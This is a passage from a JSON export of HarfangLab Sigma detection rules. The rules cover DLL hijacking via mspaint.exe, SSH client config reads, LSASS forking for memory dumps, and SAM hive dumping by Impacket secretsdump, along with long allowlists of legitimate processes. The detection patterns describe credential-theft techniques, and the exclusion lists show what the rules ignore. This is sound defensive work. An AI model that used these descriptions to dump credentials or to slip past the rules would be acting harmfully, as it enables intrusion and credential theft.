'?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4956a3c7-a3ae-4f77-8867-d59afb6ba420",
"rule_name": "DLL Hijacking via mspaint.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mspaint.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "496c255d-2d49-4b7d-9693-b89edbc5e17d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T10:57:06.348750Z",
"creation_date": "2026-03-23T11:45:35.296957Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296970Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1563/001/",
"https://attack.mitre.org/techniques/T1484/"
],
"name": "t1021_004_ssh_client_config_read_linux.yml",
"content": "title: SSH Client Configuration Read\nid: 496c255d-2d49-4b7d-9693-b89edbc5e17d\ndescription: |\n Detects an attempt to read the content of the SSH client configuration file.\n The SSH client configuration contains the security settings used by SSH.\n An attacker can read the SSH client configuration to find weaknesses in them.\n It is recommended to investigate the process performing the read operation and to look for other malicious action stemming from it.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path: '/etc/ssh/ssh_config'\n ProcessImage|contains: '?'\n - TargetPath: '/etc/ssh/ssh_config'\n ProcessImage|contains: '?'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '/usr/bin/sha256sum'\n - '/usr/bin/sha1sum'\n - '/usr/bin/md5sum'\n - '/usr/bin/sshpass'\n - '/usr/bin/ssh-keygen'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/bin/glab'\n - '/usr/bin/systemd-tmpfiles'\n - '/usr/bin/cpio'\n - '/usr/bin/rsync'\n - '/usr/bin/dockerd'\n - '/usr/local/bin/restic'\n - '/usr/bin/curl' # curl -k sftp://\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/file'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/libexec/cockpit-ssh'\n - '/usr/bin/syft'\n - '/usr/local/bin/argocd'\n - '/usr/local/bin/pathWalker'\n - '/usr/share/windsurf/windsurf'\n - '/usr/openv/netbackup/bin/bpbkar'\n - '/usr/bin/gh'\n - '/usr/bin/mksquashfs'\n - '/usr/local/Atempo/TimeNavigator/tina/Bin/*'\n\n exclusion_opt:\n - ProcessImage:\n - '/opt/eset/*'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/opt/ds_agent/ds_am'\n - '/opt/ds_agent/ds_agent'\n - '/opt/omni/lbin/vbda'\n - '/opt/pycharm-*/jbr/bin/java'\n - '/opt/endpoint-agent/agent' # https://docs.sekoia.io/integration/categories/endpoint/sekoiaio/\n - '/opt/microfocus/Discovery/.discagnt/udscan'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/opt/cybereason/sensor/bin/cbram'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/apsera/orchestrator-*/vendor/ruby/bin/ruby'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/opt/CrowdStrike/falcon-sensor-*'\n - '/opt/CARKpsmp/components/ssh' # cyberark\n - '/opt/netbackup/openv/netbackup/bin/bpbkar'\n - '/opt/bacula*/sbin/bacula-fd'\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_ssh:\n - ProcessImage:\n - '/usr/bin/ssh'\n - '/snap/*/bin/ssh'\n - '/gnu/store/*/bin/ssh'\n - ProcessParentImage: '/usr/bin/ssh'\n\n exclusion_scp:\n - ProcessImage: '/usr/bin/scp'\n - ProcessParentImage: '/usr/bin/scp'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/unattended-upgrade'\n - '/usr/bin/python3 /usr/bin/unattended-upgrades -d'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n - ProcessGrandparentCommandLine: '/bin/sh /usr/lib/apt/apt.systemd.daily install'\n\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n\n exclusion_packagekit:\n ProcessImage:\n - '/usr/libexec/packagekitd'\n - '/usr/lib/packagekit/packagekitd'\n\n # 'sed -ne s/^[[:blank:]]\\*[Hh][Oo][Ss][Tt][[:blank:]]\\{1,\\}\\([^#\\*?%]\\*\\)\\(#.\\*\\)\\{0,1\\}$/\\1/p /etc/ssh/ssh_config'\n # 'sed -ne s/^[[:blank:]]\\*[Ii][Nn][Cc][Ll][Uu][Dd][Ee][[:blank:]]\\(.\\*\\)$/\\1/p /etc/ssh/ssh_config'\n # And many others...\n exclusion_idataagent:\n ProcessImage:\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/usr/bin/mawk'\n - '/usr/bin/gawk'\n ProcessParentImage:\n - '/bin/bash'\n - '/usr/bin/bash'\n ProcessCommandLine|startswith:\n - 'sed -ne s/^[ \\t]\\*[*] /etc/ssh/ssh_config'\n - 'sed -ne s/^[[:blank:]]\\*[*] /etc/ssh/ssh_config'\n - 'sed -ne s/^[[:blank:]]\\*[*]\\(.\\*\\)$/\\1/p /etc/ssh/ssh_config'\n - 'sed -ne s/^[[:blank:]]\\*[*]\\{1,\\}\\([^#%]\\*\\)\\(#.\\*\\)\\{0,1\\}$/\\1/p /etc/ssh/ssh_config'\n - 'awk sub(*([Gg][Ll][Oo][Bb][Aa][Ll]|[Uu][Ss][Ee][Rr])[Kk][Nn][Oo][Ww][Nn][Hh][Oo][Ss][Tt][Ss][Ff][Ii][Ll][Ee][ \\t]+*) { print $0 } /'\n - 'sed -ne s/^[[:blank:]]*[Hh][Oo][Ss][Tt][[:blank:]*$/\\1/p /'\n\n exclusion_remina:\n ProcessImage|endswith: '/remmina'\n\n exclusion_fusioninventory:\n ProcessName: 'fusioninventory-agent'\n\n exclusion_vscode:\n - ProcessImage|endswith: '/usr/share/code/code'\n - ProcessAncestors|contains: '|/snap/code/*/usr/share/code/code|'\n\n exclusion_insights_client:\n - ProcessParentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n - ProcessGrandparentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n\n exclusion_sosreport:\n ProcessImage|endswith: '/python*'\n ProcessCommandLine|startswith:\n - '/usr/bin/python* /usr/*bin/sosreport'\n - '/usr/bin/python* /usr/sbin/sos report'\n\n exclusion_aide:\n ProcessImage|endswith: '/aide'\n\n exclusion_lpar2rrd:\n - ProcessParentCommandLine|endswith: '/lpar2rrd.pl'\n - ProcessGrandparentCommandLine|endswith: '/lpar2rrd.pl'\n\n exclusion_sidekiq_containerized:\n - ProcessImage|endswith: '/ruby'\n ProcessCommandLine|contains: 'sidekiq'\n ProcessParentImage|endswith: '/containerd-shim-runc-v2'\n - ProcessParentCommandLine: '*docker-entrypoint.sh sidekiq_node'\n\n exclusion_qualys1:\n - ProcessParentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n - ProcessGrandparentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_qualys2:\n # grep -Ei ^[[:blank:]]*KbdInteractiveDevices[[:blank:]]*[[:blank:]] /etc/ssh/ssh_config\n # grep -Ei ^[[:blank:]]*GSSAPIDelegateCredentials[[:blank:]]*[[:blank:]] /etc/ssh/ssh_config\n # grep -Ei ^[[:blank:]]*ForwardX11Trusted[[:blank:]]*[[:blank:]] /etc/ssh/ssh_config\n # ...\n ProcessCommandLine: 'grep -Ei ^[[:blank:]]\\**[[:blank:]]\\*[[:blank:]] /etc/ssh/ssh_config'\n ProcessParentImage:\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n ProcessGrandparentImage:\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n\n exclusion_qualys3:\n ProcessAncestors|contains: '|/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent|'\n\n exclusion_zabbix:\n - ProcessImage: '/usr/sbin/zabbix_server'\n - ProcessParentImage:\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_proxy'\n\n exclusion_centreon:\n ProcessImage: '/usr/bin/perl'\n ProcessParentImage:\n - '/usr/sbin/centengine'\n - '/usr/bin/bash'\n ProcessCommandLine:\n - '*/usr/lib/centreon/plugins/*ssh*'\n - '*/usr/lib/centreon/centreon-plugins-stable/*ssh*'\n - '*/opt/centreon-plugins/src/centreon_plugins.pl*'\n - '/usr/bin/perl /usr/lib/centreon/plugins/centreon_linux_ssh.pl *'\n\n # https://stackoverflow.com/questions/6431929/groundwork-nagios-check-by-ssh-is-returning-remote-command-execution-failed#6444377\n exclusion_nagios:\n - ProcessImage|endswith: '/nagios/plugins/check_by_ssh'\n - ProcessCommandLine|startswith: '/bin/bash /usr/lib64/nagios/plugins/check_ssh_disk.sh'\n\n exclusion_wazuh:\n - ProcessImage: '/var/ossec/bin/wazuh-syscheckd'\n - ProcessCommandLine: '/var/ossec/bin/wazuh-syscheckd'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_git:\n ProcessImage: '/usr/bin/git'\n\n exclusion_oxidized:\n ProcessImage: '/usr/bin/ruby?.?'\n ProcessCommandLine:\n - '/usr/bin/ruby?.? /usr/bin/oxidized -c /etc/oxidized/config'\n - '/usr/bin/ruby?.? /usr/local/bin/oxidized'\n - '/usr/bin/ruby?.? /usr/local/bin/oxidized -c /etc/oxidized/config'\n\n exclusion_puma:\n # puma 3.11.4 (tcp://127.0.0.1:8888) [/]\n ProcessCommandLine: 'puma * (tcp://*) [/]'\n\n exclusion_rkhunter:\n - ProcessParentCommandLine|contains: '/usr/bin/rkhunter '\n - ProcessGrandparentCommandLine|contains: '/usr/bin/rkhunter '\n\n exclusion_openvas:\n ProcessImage:\n - '/usr/sbin/openvas'\n - '/usr/local/sbin/openvas'\n\n exclusion_fish:\n ProcessImage: '/usr/bin/fish'\n ProcessCommandLine: 'fish'\n\n exclusion_fish_autocomplete_1:\n ProcessImage: '/usr/bin/fish'\n ProcessParentImage:\n - '/usr/bin/zellij'\n - '/home/*/.cargo/bin/zellij'\n\n exclusion_fish_autocomplete_2:\n ProcessImage: '/usr/bin/fish'\n ProcessParentCommandLine: '/usr/bin/python3 /usr/bin/terminator'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_ansible_script:\n ProcessCommandLine|contains: '/tmp/ansible-tmp-*/AnsiballZ_dnf.py'\n\n exclusion_ansible_connection:\n # /data/infra/ansible/bin/python3.9 /data/infra/ansible/bin/ansible-connection 1042369 303ea700-b19a-4de9-0ebc-000000000015\n ProcessCommandLine: '/*/ansible/bin/python3.* /*/ansible/bin/ansible-connection * ????????-????-????-????-????????????'\n\n exclusion_wezterm_gui:\n ProcessImage: '/usr/bin/wezterm-gui'\n\n exclusion_clamscan:\n ProcessImage: '/usr/bin/clamscan'\n\n exclusion_tanium:\n ProcessParentCommandLine|startswith: '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n\n exclusion_containerd:\n - ProcessImage: '/usr/bin/containerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/containerd|'\n\n exclusion_x2goclient:\n ProcessCommandLine:\n - 'x2goclient'\n - '/usr/bin/x2goclient'\n\n # Many different software use a feature that will use sed -ne to read into the SSH configuration file to find values.\n # For instance, opening a terminal and typing \"ssh sr\" and then pressing tab, will cause bash to generate the following command:\n # sed -ne s/^[[:blank:]]*[Hh][Oo][Ss][Tt][[:blank:]]\\(.*\\)$/\\1/p /etc/ssh/ssh_config /home/user1/.ssh/config\n # There are many of these patterns that may be used, so we preferred to simply whitelist the sed -ne commands here.\n exclusion_autocomplete:\n ProcessCommandLine|startswith: 'sed -ne'\n\n exclusion_kalilab:\n ProcessCommandLine: '/usr/bin/php /var/www/kalilab/scripts/checkServeur.php'\n\n exclusion_augtool:\n ProcessImage: '/usr/bin/augtool'\n\n exclusion_rubycat:\n ProcessImage:\n - '/usr/bin/rubycat-sshproxy'\n - '/usr/bin/rubycat-w3shproxy'\n\n exclusion_tripwire:\n ProcessImage: '/usr/sbin/tripwire'\n\n exclusion_convert2rhel:\n ProcessCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_proxmox:\n ProcessImage: '/usr/local/sbin/proxmox-backup-client'\n\n exclusion_codium:\n ProcessImage:\n - '/usr/share/codium/codium'\n - '/opt/vscodium-bin/codium'\n\n exclusion_grep:\n ProcessCommandLine:\n - 'grep * /'\n - 'grep * /etc'\n - 'grep * /etc/'\n - 'grep --color=auto -R *'\n\n exclusion_awk:\n ProcessImage:\n - '/usr/bin/gawk'\n - '/usr/bin/mawk'\n ProcessCommandLine|startswith: 'awk sub(\"^[ \\t]'\n\n exclusion_puppet:\n ProcessCommandLine|startswith:\n - '/usr/bin/ruby /usr/bin/puppet agent '\n - '/usr/bin/ruby /usr/bin/facter '\n\n # https://blog.remirepo.net/\n exclusion_remi:\n ProcessImage: '/opt/remi/php83/root/usr/bin/php'\n\n exclusion_borg:\n ProcessCommandLine|startswith: '/usr/bin/python* /usr/bin/borg '\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "496c255d-2d49-4b7d-9693-b89edbc5e17d",
"rule_name": "SSH Client Configuration Read",
"rule_description": "Detects an attempt to read the content of the SSH client configuration file.\nThe SSH client configuration contains the security settings used by SSH.\nAn attacker can read the SSH client configuration to find weaknesses in them.\nIt is recommended to investigate the process performing the read operation and to look for other malicious action stemming from it.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1484",
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "496ce697-ec9d-4248-b8af-e516a75b74ec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075101Z",
"creation_date": "2026-03-23T11:45:34.075103Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075108Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/D4stiny/ForkPlayground/",
"https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_memory_dump_forkdump.yml",
"content": "title: LSASS Process Accessed with Fork-related Privilege\nid: 496ce697-ec9d-4248-b8af-e516a75b74ec\ndescription: |\n Detects an LSASS process access with a single privilege, required to create a fork process.\n Adversaries may create a fork of the LSASS process and dump its memory instead of accessing original LSASS' memory to bypass security solutions.\n It is recommended to analyze the source process for malicious behavior.\nreferences:\n - https://github.com/D4stiny/ForkPlayground/\n - https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2024/01/26\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetProcessImage|endswith: '\\lsass.exe'\n GrantedAccessStr: 'PROCESS_CREATE_PROCESS'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "496ce697-ec9d-4248-b8af-e516a75b74ec",
"rule_name": "LSASS Process Accessed with Fork-related Privilege",
"rule_description": "Detects an LSASS process access with a single privilege, required to create a fork process.\nAdversaries may create a fork of the LSASS process and dump its memory instead of accessing original LSASS' memory to bypass security solutions.\nIt is recommended to analyze the source process for malicious behavior.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "498a0b65-6788-4347-b4b0-645b52399252",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618521Z",
"creation_date": "2026-03-23T11:45:34.618523Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618527Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/secretsdump.py#L795",
"https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/secretsdump.py#L799",
"https://attack.mitre.org/techniques/T1003/004/"
],
"name": "t1003_004_secretsdump_lsa_secrets.yml",
"content": "title: SAM database Dumped via Impacket Secretsdump\nid: 498a0b65-6788-4347-b4b0-645b52399252\ndescription: |\n Detects via a filename heuristic when Secretsdump.py, a tool from the Impacket framework, dumps the SAM or SECURITY hive to disk in order to parse secret keys or password hashes.\n This tool is often used by attackers to extract sensitive information and perform credential dumping as part of lateral movement.\n The dumped files are typically stored in the %SystemRoot%\\System32 or %Temp% directories with a random filename containing an 8-character prefix and a \".tmp\" extension (e.g., C:\\Windows\\System32\\kzqAwMLN.tmp).\n It is recommended to investigate the source of this activity by correlating this alert with authentications and network requests.\n Additionally, ensure that the Impacket framework is being used legitimately in your environment (for example, as a penetration testing exercise).\nreferences:\n - https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/secretsdump.py#L795\n - https://github.com/SecureAuthCorp/impacket/blob/master/impacket/examples/secretsdump.py#L799\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2020/10/06\nmodified: 2025/02/10\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.004\n - attack.t1078\n - classification.Windows.Source.Filesystem\n - classification.Windows.Framework.Impacket\n - classification.Windows.HackTool.Secretsdump\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n # this is actually performed by Remote Registry service in a svchost process :\n # - 2012 : shared with other services\n # - win10 : it's own process with commandline 'C:\\\\Windows\\\\system32\\\\svchost.exe -k localService -p -s RemoteRegistry' for instance\n Image|endswith: '\\svchost.exe'\n Path:\n - '?:\\windows\\system32\\\\????????.tmp'\n - '?:\\Windows\\Temp\\\\????????.tmp'\n\n exclusion_legitimate_svchost:\n - ProcessCommandLine:\n - '?:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s UmRdpService'\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\Windows\\system32\\svchost.exe -k UserProfileService -p -s ProfSvc'\n - '?:\\windows\\system32\\svchost.exe -k osrss -s osrss'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n - ProcessCommandLine: '?:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted'\n Path: '?:\\Windows\\Temp\\prn*.tmp'\n\n exclusion_known_prefix:\n Path: '?:\\Windows\\Temp\\TMP4352$.tmp'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "498a0b65-6788-4347-b4b0-645b52399252",
"rule_name": "SAM database Dumped via Impacket Secretsdump",
"rule_description": "Detects via a filename heuristic when Secretsdump.py, a tool from the Impacket framework, dumps the SAM or SECURITY hive to disk in order to parse secret keys or password hashes.\nThis tool is often used by attackers to extract sensitive information and perform credential dumping as part of lateral movement.\nThe dumped files are typically stored in the %SystemRoot%\\System32 or %Temp% directories with a random filename containing an 8-character prefix and a \".tmp\" extension (e.g., C:\\Windows\\System32\\kzqAwMLN.tmp).\nIt is recommended to investigate the source of this activity by correlating this alert with authentications and network requests.\nAdditionally, ensure that the Impacket framework is being used legitimately in your environment (for example, as a penetration testing exercise).\n",
"rule_creation_date": "2020-10-06",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.004",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4996243a-ea42-46d9-a1b0-e483d412ded9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
